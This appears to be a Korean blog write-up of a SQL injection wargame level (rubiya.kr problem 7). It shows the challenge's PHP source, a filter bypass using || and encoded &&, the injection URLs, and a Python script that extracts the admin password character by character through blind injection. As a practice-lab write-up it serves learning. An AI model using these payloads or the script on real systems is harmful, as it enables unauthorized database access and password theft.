http://rubiya.kr/sqli/prob7.php
<?php
include "./dbconn.php";
include "./solve.php";
if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/and|or/i', $_GET[pw])) exit("HeHe");
$query = "select id from prob7 where id='guest' and pw='{$_GET[pw]}'";
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = @mysql_fetch_array(mysql_query($query));
if($result['id']) echo "<h2>Hello {$result[id]}</h2>";
$_GET[pw] = addslashes($_GET[pw]);
$query = "select pw from prob7 where id='admin' and pw='{$_GET[pw]}'";
$result = @mysql_fetch_array(mysql_query($query));
if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve();
highlight_file(__FILE__);
?>
pw를 받아서 and,or필터링. 이것도 addslashes전후로 쿼리가 나눠져있으니 블라인드 인젝션이라고 예측.
and = &&로 우회, or = ||로 우회. &&은 url에서 쓰이는거 같으므로 인코딩시킨 %26%26으로 보낼 것.
http://rubiya.kr/sqli/prob7.php?pw=a%27%20||%20ascii(substr(id,1,1))=97%20%26%26%20%271%27=%271
query : select id from prob7 where id='guest' and pw='a' || ascii(substr(id,1,1))=97 && '1'='1'
id에서 한글자 뽑아왔는데 97일경우 true뜸. admin 잘되는거 확인완료. 길이를 구하면
http://rubiya.kr/sqli/prob7.php?pw=a%27%20||%20length(pw)=8%20%26%26%20%271%27=%271
query : select id from prob7 where id='guest' and pw='a' || length(pw)=8 && '1'='1'
길이 8글자 확인.
import urllib,urllib2
# -*- coding: euc-kr -*-
answer = ''
for i in range(1,9):
for j in range(32,127):
print j
req = urllib2.Request('http://rubiya.kr/sqli/prob7.php?pw=a%27%20||%20ascii(substr(pw,'+str(i)+',1))='+str(j)+'%20%26%26%20%271%27=%271')
res = urllib2.urlopen(req)
if res.read().find('Hello admin') != -1:
print i,':',chr(j)
answer += chr(j)
break
print answer
'webhacking > sql, sql injection' 카테고리의 다른 글
| rubiya.kr 9번 (0) | 2014.08.28 |
|---|---|
| rubiya.kr 8번. (0) | 2014.08.28 |
| rubiya.kr 6번 (0) | 2014.08.28 |
| rubiya.kr 5번. (0) | 2014.08.28 |
| rubiya.kr 4번 (0) | 2014.08.28 |